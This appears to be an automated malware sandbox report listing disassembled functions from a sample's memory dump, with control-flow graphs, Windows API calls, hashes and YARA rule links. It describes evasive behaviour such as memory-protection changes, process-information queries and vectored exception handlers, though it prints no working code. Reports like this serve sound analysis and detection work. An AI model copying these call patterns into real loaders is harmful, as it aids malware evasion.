                                        Uniqueness Score: -1.00%

                                        Function 0049D6F0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 299memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 326 49d6f0-49d726 327 49d728-49d730 326->327 328 49d732-49d733 326->328 329 49d735-49d75a HeapCreate 327->329 328->329 331 49d75c-49d75f 329->331 332 49d764-49d78e 329->332 333 49d988-49d98b 331->333 337 49d7ef-49d7f5 332->337 338 49d790-49d798 332->338 335 49d9e9-49da02 333->335 336 49d98d-49d9b8 333->336 336->335 342 49d9ba-49d9d1 336->342 343 49d7f7-49d7f9 337->343 344 49d79a-49d7a3 338->344 345 49d7a7 338->345 342->335 355 49d9d3-49d9de 342->355 343->333 346 49d7ff-49d824 call 499ddc 343->346 347 49d7a9-49d7e6 344->347 348 49d7a5 344->348 345->347 349 49d7e8-49d7ed 345->349 356 49d83b 346->356 357 49d826-49d82b 346->357 347->343 348->345 349->343 355->335 358 49d9e0-49d9e8 355->358 361 49d840-49d847 356->361 359 49d82d-49d832 357->359 360 49d834-49d839 357->360 358->335 359->360 363 49d84e-49d850 359->363 360->361 361->363 363->333 365 49d856-49d88d 363->365 367 49d893-49d8a6 call 4a1c0e 365->367 368 49d934 365->368 374 49d8a8-49d8b9 367->374 375 49d8fa 367->375 370 49d939-49d943 368->370 370->333 371 49d945-49d95d call 48bb1c 370->371 371->333 379 49d95f-49d981 call 495700 call 49c35c 371->379 377 49d8bb-49d8f0 call 4a83c4 374->377 378 49d901-49d909 375->378 386 49d8f2-49d8f8 377->386 381 49d90b-49d91b 378->381 382 49d91d-49d932 378->382 389 49d986 379->389 381->370 382->370 386->378 389->333
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID: .bss
                                        • API String ID: 10892065-3890483948
                                        • Opcode ID: bcb695e513be0e9aada754749e1a2981e9d9c3b14060af814ceaafec8049f9d2
                                        • Instruction ID: f6f0396509ebe894f361e3898ca158636b16c2ec0e28234ee0a516cd5c91688e
                                        • Opcode Fuzzy Hash: bcb695e513be0e9aada754749e1a2981e9d9c3b14060af814ceaafec8049f9d2
                                        • Instruction Fuzzy Hash: 1D81B770B18B054FEB18EF69A8897A777D5FB94315F04813EE88AC3261DE78D8428785
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004BD002 Relevance: 3.3, APIs: 2, Instructions: 340nativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 390 4bd002-4bd063 394 4bd069-4bd082 390->394 395 4bd33d-4bd355 390->395 396 4bd088-4bd091 394->396 397 4bd237-4bd282 NtProtectVirtualMemory 394->397 402 4bd358-4bd36a 395->402 396->397 401 4bd097-4bd09f 396->401 399 4bd288-4bd289 397->399 400 4bd31c-4bd31e 397->400 404 4bd28d-4bd28f 399->404 400->402 403 4bd320-4bd33b 400->403 405 4bd0a2-4bd0ae 401->405 403->402 404->402 408 4bd295-4bd299 404->408 406 4bd0cc-4bd0fa 405->406 407 4bd0b0-4bd0b1 405->407 417 4bd228-4bd229 406->417 418 4bd100-4bd111 406->418 409 4bd0b3-4bd0ca 407->409 411 4bd29b-4bd2af 408->411 412 4bd2b1-4bd2b5 408->412 409->406 409->409 413 4bd2d0-4bd316 NtProtectVirtualMemory 411->413 414 4bd2cd-4bd2ce 412->414 415 4bd2b7-4bd2cb 412->415 413->400 413->404 414->413 415->413 421 4bd22e-4bd231 417->421 419 4bd11e-4bd13a 418->419 420 4bd113-4bd118 418->420 423 4bd20c-4bd220 419->423 424 4bd140-4bd17e 419->424 420->419 422 4bd204-4bd205 420->422 421->397 421->402 422->423 423->405 425 4bd226 423->425 428 4bd180-4bd188 424->428 429 4bd1a7-4bd1c3 424->429 425->421 430 4bd18a-4bd191 428->430 431 4bd193-4bd1a4 428->431 433 4bd1c8-4bd1ca 429->433 434 4bd1c5 429->434 430->430 430->431 431->429 435 4bd1fe-4bd1ff 433->435 436 4bd1cc-4bd1ee 433->436 434->433 435->422 436->423 437 4bd1f0-4bd1f9 436->437 437->424
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL ref: 004BD27A
                                        • NtProtectVirtualMemory.NTDLL ref: 004BD309
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.723108296.00000000004BD000.00000040.80000000.00040000.00000000.sdmp, Offset: 004BD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_4bd000_control.jbxd
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: 6ea80581febb14541cae0c6372c58aaf20c897dd6a38cb38723a699da10b087a
                                        • Instruction ID: d6f73aae4b9b69bdd7f53191a12554d8823f3d61369a8a27f061ff5b70eccc9c
                                        • Opcode Fuzzy Hash: 6ea80581febb14541cae0c6372c58aaf20c897dd6a38cb38723a699da10b087a
                                        • Instruction Fuzzy Hash: C7A1053160CBC84FC729DF28C8816A6B7E1FB96314F5845AFD4CBC7252E638E8068756
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049342C Relevance: 1.7, APIs: 1, Instructions: 166nativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 626 49342c-493463 627 493465-493478 626->627 628 493487-493493 call 495700 626->628 627->628 632 49347a-493482 627->632 633 493499-4934a2 628->633 634 493597 628->634 639 4935ac-4935c7 632->639 636 4934a4-4934cb NtSetInformationProcess 633->636 637 4934f6-49351a 633->637 635 49359c-49359f 634->635 635->639 640 4935a1-4935a2 635->640 641 4934cd-4934d0 call 4a0a50 636->641 642 4934df-4934eb 636->642 645 49351c-49351f 637->645 646 493521-49353b call 4ab778 637->646 640->639 647 4934d5-4934dd 641->647 642->635 650 4934f1-4934f4 642->650 645->635 651 493540-493544 646->651 647->650 650->637 650->646 651->635 652 493546-49354d 651->652 653 493559-493578 call 4864f4 652->653 654 49354f-493554 call 4998b8 652->654 658 49357a-493582 653->658 659 493584 653->659 654->653 660 49358a-493595 658->660 659->660 660->635
                                        APIs
                                        • NtSetInformationProcess.NTDLL ref: 004934C3
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: InformationProcess
                                        • String ID:
                                        • API String ID: 1801817001-0
                                        • Opcode ID: d6d84e3bb9dd6a3a32229d93f8a1402ec101a5eec1c7a21b6302d409a679c35e
                                        • Instruction ID: 237f027f3f7bcbed4e514d1553c53ecb72fe47fc262b08910454e69a06f27012
                                        • Opcode Fuzzy Hash: d6d84e3bb9dd6a3a32229d93f8a1402ec101a5eec1c7a21b6302d409a679c35e
                                        • Instruction Fuzzy Hash: B241D67071CA049FDB54EF68D8996667BE1FB9D311B41453EE80AC3261EF38D901CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00494E14 Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00494E3A
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID:
                                        • API String ID: 1778838933-0
                                        • Opcode ID: c503bf7d7d7a019e0c860b740dfeab7730271f63f23cf6932b594c406d3ab55a
                                        • Instruction ID: 25f9766362e2ded6a9d31626f53a1b618d3de8650da760066714052881b20e10
                                        • Opcode Fuzzy Hash: c503bf7d7d7a019e0c860b740dfeab7730271f63f23cf6932b594c406d3ab55a
                                        • Instruction Fuzzy Hash: 4D011D30614A0D8FDFD4EF68D4C5E6677E4FBE8305B50057EA40AC7264D628D886CB46
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A0A50 Relevance: 1.5, APIs: 1, Instructions: 26nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 004A0A6D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID:
                                        • API String ID: 1778838933-0
                                        • Opcode ID: ba1bc30c40748ce948f6a65f135ead804c1aaee94283eeae431a27c628f6e2b2
                                        • Instruction ID: f635bab6b4843b8c3c73793ec4df1d348620c78049d41bc42525f206c312074c
                                        • Opcode Fuzzy Hash: ba1bc30c40748ce948f6a65f135ead804c1aaee94283eeae431a27c628f6e2b2
                                        • Instruction Fuzzy Hash: DDE08630A04A084BCF4CEB6CDCCD56473D2FB98301F64456ED50ACB159D534D5894B41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00497CA8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 16 497ca8-497cef call 482e84 19 497d8e-497d95 16->19 20 497cf5-497d26 RegQueryValueExA 16->20 23 497dc9-497dd1 19->23 24 497d97-497d9f 19->24 21 497d28-497d2d 20->21 22 497d2f-497d38 call 4926e8 20->22 21->22 27 497d3d-497d4c 21->27 22->27 25 497e41-497e50 23->25 26 497dd3-497dec 23->26 29 497dbf 24->29 30 497da1-497dbd call 49879c 24->30 36 497e3a-497e3b 26->36 37 497dee-497e30 26->37 31 497d4e-497d81 27->31 32 497d83-497d84 27->32 29->23 30->23 30->29 31->32 32->19 36->25 37->36
                                        APIs
                                          • Part of subcall function 00482E84: RegCreateKeyA.ADVAPI32(?,?,00000027,0049D6DF), ref: 00482EA7
                                        • RegQueryValueExA.KERNELBASE ref: 00497D1C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CreateQueryValue
                                        • String ID: ($(
                                        • API String ID: 2711935003-222463766
                                        • Opcode ID: d7db21f0d3aee69494936f9fdaba2ea910a32f97dffb48d077b5270f4ba7ff74
                                        • Instruction ID: 1c08fdf26345deb2dbdce4b183b519f088a281284fc02e1fa436b1b68ec3f99f
                                        • Opcode Fuzzy Hash: d7db21f0d3aee69494936f9fdaba2ea910a32f97dffb48d077b5270f4ba7ff74
                                        • Instruction Fuzzy Hash: C64194346687488FFB48EF58E884AA677E5FB98309F00852ED48AC3260DB7CD941CB45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A6934 Relevance: 4.6, APIs: 3, Instructions: 101registrymemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 39 4a6934-4a6985 RegQueryValueExA 40 4a698d-4a69a5 RtlAllocateHeap 39->40 41 4a6987-4a698b 39->41 43 4a69de-4a6a05 RegQueryValueExA 40->43 44 4a69a7 40->44 42 4a69c1-4a69dd 41->42 45 4a69aa-4a69ad 43->45 46 4a6a07-4a6a11 43->46 44->45 45->42 47 4a69af-4a69b9 45->47 46->42 47->42
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: QueryValue$AllocateHeap
                                        • String ID:
                                        • API String ID: 2311914766-0
                                        • Opcode ID: 691f6accf525634dd8e852d428e426211876acad570e19402203f4706332e8cf
                                        • Instruction ID: fa8751163aefe36cd42953dc13b196ca0ca7e1a4e8492c2dbdb176e4a2bf4600
                                        • Opcode Fuzzy Hash: 691f6accf525634dd8e852d428e426211876acad570e19402203f4706332e8cf
                                        • Instruction Fuzzy Hash: 6F31AE7161CB088FEB58EF18D489666B3E1FBA8301F15452EE84EC3252DF34E845CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004AC89C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 274 4ac89c-4ac919 275 4ac91b-4ac93b 274->275 276 4ac940-4ac96c 274->276 283 4acb72-4acb89 275->283 277 4ac96e-4ac980 276->277 278 4ac982-4ac986 276->278 279 4ac98a-4ac996 277->279 278->279 281 4ac998-4ac9a7 279->281 282 4ac9b4-4ac9b7 279->282 293 4acb48-4acb52 281->293 294 4ac9ad-4ac9ae 281->294 284 4aca8b-4aca93 282->284 285 4ac9bd-4ac9c0 282->285 286 4acaa4-4acaa7 284->286 287 4aca95-4acaa2 284->287 289 4ac9c2-4ac9d2 285->289 290 4ac9d4-4ac9e5 LoadLibraryA 285->290 291 4acaad-4acab0 286->291 292 4acb44-4acb45 286->292 287->286 289->290 295 4aca3f-4aca49 289->295 290->295 296 4ac9e7-4ac9fb 290->296 298 4acadb-4acaef 291->298 299 4acab2-4acab5 291->299 292->293 302 4acb6f-4acb70 293->302 303 4acb54-4acb69 293->303 294->282 300 4aca7b-4aca7c 295->300 301 4aca4b-4aca4f 295->301 309 4aca0f-4aca3a 296->309 310 4ac9fd-4aca0d 296->310 298->292 315 4acaf1-4acb05 298->315 299->298 305 4acab7-4acac2 299->305 307 4aca84-4aca85 300->307 306 4aca51-4aca62 301->306 301->307 302->283 303->302 305->298 311 4acac4-4acac9 305->311 306->307 319 4aca64-4aca79 306->319 307->284 309->283 310->295 310->309 311->298 313 4acacb-4acad0 311->313 313->298 318 4acad2-4acad9 313->318 321 4acb07-4acb12 315->321 322 4acb14-4acb17 315->322 318->292 318->298 319->307 321->322 322->292 323 4acb19-4acb40 322->323 323->292
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: H
                                        • API String ID: 1029625771-2852464175
                                        • Opcode ID: d09c529806326730a3c2b824ec72db9bb745c8df5574f8816ad0a225f454d2ce
                                        • Instruction ID: 35fa4ee124165c4c4607694462f7c62dda04bd3a37c42401e5abf4ec3d83e6d3
                                        • Opcode Fuzzy Hash: d09c529806326730a3c2b824ec72db9bb745c8df5574f8816ad0a225f454d2ce
                                        • Instruction Fuzzy Hash: FAA17F70508F098FE755DF28D8897B6B7E1FBA9305F00462ED88AC7261EF78D9418B85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049D054 Relevance: 3.2, APIs: 2, Instructions: 222stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 438 49d054-49d0a6 440 49d23d 438->440 441 49d0ac-49d0af 438->441 442 49d242-49d258 440->442 443 49d0b1-49d0b7 441->443 444 49d0b9-49d0bc 443->444 445 49d104-49d106 443->445 448 49d0ea-49d0ec 444->448 449 49d0be-49d0c1 444->449 446 49d108-49d10d 445->446 447 49d10f-49d112 445->447 446->447 452 49d118-49d13a 447->452 453 49d224 447->453 450 49d0ee-49d0f5 448->450 451 49d0f7-49d0f8 448->451 449->448 454 49d0c3-49d0c5 449->454 450->451 456 49d0fb-49d102 451->456 463 49d21d-49d222 452->463 464 49d140-49d14d 452->464 455 49d229-49d23b RtlDeleteBoundaryDescriptor 453->455 457 49d0c7-49d0ca 454->457 458 49d0e6-49d0e8 454->458 455->442 456->443 456->445 457->447 459 49d0cc-49d0d7 457->459 458->456 461 49d0d9 459->461 462 49d0dc-49d0e3 459->462 461->462 462->458 463->455 465 49d210-49d21b 464->465 466 49d153-49d159 464->466 465->455 467 49d15b-49d1af 466->467 470 49d1b1-49d1b2 467->470 471 49d1e7-49d205 467->471 472 49d1b4-49d1c3 lstrcmp 470->472 471->467 478 49d20b-49d20c 471->478 473 49d1e0 472->473 474 49d1c5-49d1dc 472->474 477 49d1e2-49d1e3 473->477 474->472 476 49d1de 474->476 476->477 477->471 478->465
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: BoundaryDeleteDescriptorlstrcmp
                                        • String ID:
                                        • API String ID: 735288309-0
                                        • Opcode ID: a035d7e6160fc5933013b099fdcea635bafb3ef4c34cb4e37c1e5d9712410046
                                        • Instruction ID: 813ceaa7f858eb74800f0d8c079118f080cdca0a6c7948c481b02decbe422668
                                        • Opcode Fuzzy Hash: a035d7e6160fc5933013b099fdcea635bafb3ef4c34cb4e37c1e5d9712410046
                                        • Instruction Fuzzy Hash: F8511531A1CA484FDB2CAE589C8A27A7BD1E789314F54853FD9CAC3321D9289C4387C6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0048FB94 Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 479 48fb94-48fbdc call 487c90 482 48fbe2-48fbfb call 4aae0c 479->482 483 48fd65-48fd6a 479->483 488 48fd5b-48fd63 482->488 489 48fc01-48fc32 call 48e1b0 482->489 484 48fd6e-48fd8e 483->484 488->484 489->484 493 48fc38-48fc40 489->493 494 48fcbb-48fcea VirtualProtect 493->494 495 48fc42-48fc47 493->495 496 48fcf9-48fd51 call 494e14 494->496 497 48fcec-48fcf4 call 48f068 494->497 495->494 498 48fc49-48fc5b call 481d04 495->498 496->484 510 48fd53-48fd59 496->510 497->496 498->494 503 48fc5d-48fc75 call 4aae0c 498->503 503->494 508 48fc77-48fcb5 VirtualProtect 503->508 508->494 510->484
                                        APIs
                                          • Part of subcall function 004AAE0C: VirtualProtect.KERNELBASE ref: 004AAE3F
                                        • VirtualProtect.KERNELBASE ref: 0048FCB5
                                        • VirtualProtect.KERNELBASE ref: 0048FCD8
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 8ea83be550972cb450592169f40a817b38715dbbb1922746b1f8c87917cf9e29
                                        • Instruction ID: 367965dd821ab09bda3267acfa040ed278ffab5e36845f6bd085cf842d70411d
                                        • Opcode Fuzzy Hash: 8ea83be550972cb450592169f40a817b38715dbbb1922746b1f8c87917cf9e29
                                        • Instruction Fuzzy Hash: B5517170618F098FDB54EF19D88576AB7E0FB5C315F10056EA84EC3261DB38E945CB8A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049C35C Relevance: 3.2, APIs: 2, Instructions: 152COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 511 49c35c-49c3aa 512 49c3ac-49c3ad 511->512 513 49c3b4-49c3c7 call 49d04c 511->513 512->513 516 49c3c9-49c3db StrRChrA 513->516 517 49c40b-49c444 call 49e6c4 513->517 518 49c3dd-49c3e0 516->518 519 49c3e2-49c3e3 516->519 523 49c46a-49c472 517->523 524 49c446-49c44c 517->524 521 49c3e9-49c405 call 49e8e8 518->521 519->521 521->517 525 49c480-49c4a6 523->525 526 49c474-49c47e 523->526 524->523 528 49c44e-49c456 524->528 536 49c4a8-49c4af call 49039c 525->536 537 49c4df-49c4e5 525->537 526->525 529 49c4eb-49c4f5 526->529 528->523 530 49c458-49c45d 528->530 531 49c505-49c516 529->531 532 49c4f7-49c4fe 529->532 535 49c45f-49c468 530->535 532->531 535->523 535->535 536->537 545 49c4b1-49c4b8 536->545 544 49c4e7-49c4e9 537->544 544->529 544->531 546 49c4ba-49c4ca RtlAddVectoredContinueHandler 545->546 547 49c4d0-49c4d3 call 4963e0 545->547 546->547 549 49c4d8-49c4dd 547->549 549->537 549->544
                                        APIs
                                        • StrRChrA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,0049D986), ref: 0049C3CF
                                        • RtlAddVectoredContinueHandler.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,0049D986), ref: 0049C4C3
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: ContinueHandlerVectored
                                        • String ID:
                                        • API String ID: 3758255415-0
                                        • Opcode ID: b28ead03b6f17f077c7dc345d89b0409a2fd3f2d37b0af1fd57a6036940bf9cd
                                        • Instruction ID: 1019684eeb72bfdba2835faf63656a7172d8a497b8bc30dfbd3fbab115cb41a8
                                        • Opcode Fuzzy Hash: b28ead03b6f17f077c7dc345d89b0409a2fd3f2d37b0af1fd57a6036940bf9cd
                                        • Instruction Fuzzy Hash: 8F41D630618A058FEB55EF3998A86FA7BD2EB98314B41813ED446C32A1DF3CD945C745
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A0150 Relevance: 3.1, APIs: 2, Instructions: 114registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 550 4a0150-4a0195 call 4a1860 553 4a019b-4a01bc RegOpenKeyExA 550->553 554 4a024f-4a0265 550->554 555 4a01be-4a01df 553->555 556 4a01e1-4a020d call 4a6934 553->556 555->556 560 4a023d-4a0247 555->560 561 4a020f-4a022f call 4a6934 556->561 562 4a0232-4a0237 RegCloseKey 556->562 560->554 561->562 562->560
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID:
                                        • API String ID: 47109696-0
                                        • Opcode ID: cf0eea27d486248f014806f930f76e3e3fc097b1d19b2d7a851f237fce4887c9
                                        • Instruction ID: 881d3ee48de94526a5cb8bed8032e423904d31f452325c79fd06850945dfc1d3
                                        • Opcode Fuzzy Hash: cf0eea27d486248f014806f930f76e3e3fc097b1d19b2d7a851f237fce4887c9
                                        • Instruction Fuzzy Hash: 76314031618F0C8FC794EF6CD894A6A73E1FBA8305B414A7EA04EC3261DB38D944C786
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049E334 Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 565 49e334-49e37c RegQueryValueExA 566 49e3dc-49e3ff RegCloseKey 565->566 567 49e37e-49e397 565->567 569 49e399-49e3bb 567->569 570 49e3d7 567->570 572 49e3bd-49e3c1 569->572 573 49e3c3-49e3d5 569->573 570->566 572->566 573->566
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID:
                                        • API String ID: 3356406503-0
                                        • Opcode ID: 9778043a067b8a527297b0f87568c0098e8f9f1ff45dfcd7ca02eb2e6cd67be0
                                        • Instruction ID: a17a1e4e24f91cd6076bff9cff57bb498816b787bff5d1a6cfe9983ecfdb99f4
                                        • Opcode Fuzzy Hash: 9778043a067b8a527297b0f87568c0098e8f9f1ff45dfcd7ca02eb2e6cd67be0
                                        • Instruction Fuzzy Hash: 09215131618B088FE754EF29E84966577E1FB98311F10456EE849C3361DA74DC41CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00482E84 Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 575 482e84-482ea5 576 482eb4-482eba RegOpenKeyA 575->576 577 482ea7-482eb2 RegCreateKeyA 575->577 578 482ebf-482ec5 576->578 577->578 579 482f04-482f16 578->579 580 482ec7-482efa call 494980 578->580 580->579 584 482efc-482f02 580->584 584->579
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(?,?,00000027,0049D6DF), ref: 00482EA7
                                        • RegOpenKeyA.ADVAPI32(?,?,00000027,0049D6DF), ref: 00482EB4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CreateOpen
                                        • String ID:
                                        • API String ID: 436179556-0
                                        • Opcode ID: 0c972040c102cc2f42c03aa901a81eabdfe5d1137f8b427ae3f6b9032299b1a0
                                        • Instruction ID: 2fd9a561415142ae9fda471e1a554ab3f78b1fcecf9d3bb925da0ec4b2ab5f1c
                                        • Opcode Fuzzy Hash: 0c972040c102cc2f42c03aa901a81eabdfe5d1137f8b427ae3f6b9032299b1a0
                                        • Instruction Fuzzy Hash: 7F018830618A144FDB45EB5CD448B2AB7E5FBE8351F10042EE94DC3360DBB4C945C746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0048A280 Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 585 48a280-48a2bb 586 48a2dd-48a303 call 494530 585->586 587 48a2bd-48a2be 585->587 595 48a305-48a324 call 499500 586->595 596 48a326 586->596 588 48a2c4-48a2c7 587->588 590 48a2c9-48a2d2 588->590 591 48a2d6-48a2d8 588->591 590->588 593 48a2d4 590->593 594 48a469-48a483 591->594 593->586 597 48a32a-48a32d 595->597 596->597 599 48a333-48a345 call 4aa120 597->599 600 48a457-48a45f 597->600 606 48a463-48a467 599->606 607 48a34b-48a356 599->607 600->606 606->594 609 48a358-48a361 607->609 610 48a363-48a36d 607->610 611 48a370-48a384 call 4aae0c 609->611 610->611 614 48a38a-48a393 611->614 615 48a43b-48a455 611->615 616 48a39d-48a3d6 VirtualProtect 614->616 617 48a395-48a39a 614->617 615->606 618 48a3d8-48a3e0 call 48f068 616->618 619 48a3e5-48a433 616->619 617->616 618->619 619->606 625 48a435-48a439 619->625 625->606
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: ba3dc00b23c375a8afa08ad11b738f538cec6448654b2d0f9f9c204c69557505
                                        • Instruction ID: d239d1d6a88214a9e680a7ec4a61698bfa8ff2de25dd5dbf1dcf4e6638ab90dc
                                        • Opcode Fuzzy Hash: ba3dc00b23c375a8afa08ad11b738f538cec6448654b2d0f9f9c204c69557505
                                        • Instruction Fuzzy Hash: 52616830518F099FEB54FF18E48962A77E0FB68311B60456FE84AC3651DB78EC52CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004AB608 Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlDeleteBoundaryDescriptor.NTDLL ref: 004AB74E
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: BoundaryDeleteDescriptor
                                        • String ID:
                                        • API String ID: 3203483114-0
                                        • Opcode ID: 79c545cff3d4f4874d1debdf51ccbfd0d11bc462c169503f2f46beeac4d5d06f
                                        • Instruction ID: 7a62c47e4f731c8b5b387dd52f1c92e734950b9b462b293e47c5caa097fd6687
                                        • Opcode Fuzzy Hash: 79c545cff3d4f4874d1debdf51ccbfd0d11bc462c169503f2f46beeac4d5d06f
                                        • Instruction Fuzzy Hash: 9741A230718E5C8FDB18EF68D88596A73E1F7AA350B54452AE04AC7322DA78DC85C7C6
                                        Uniqueness

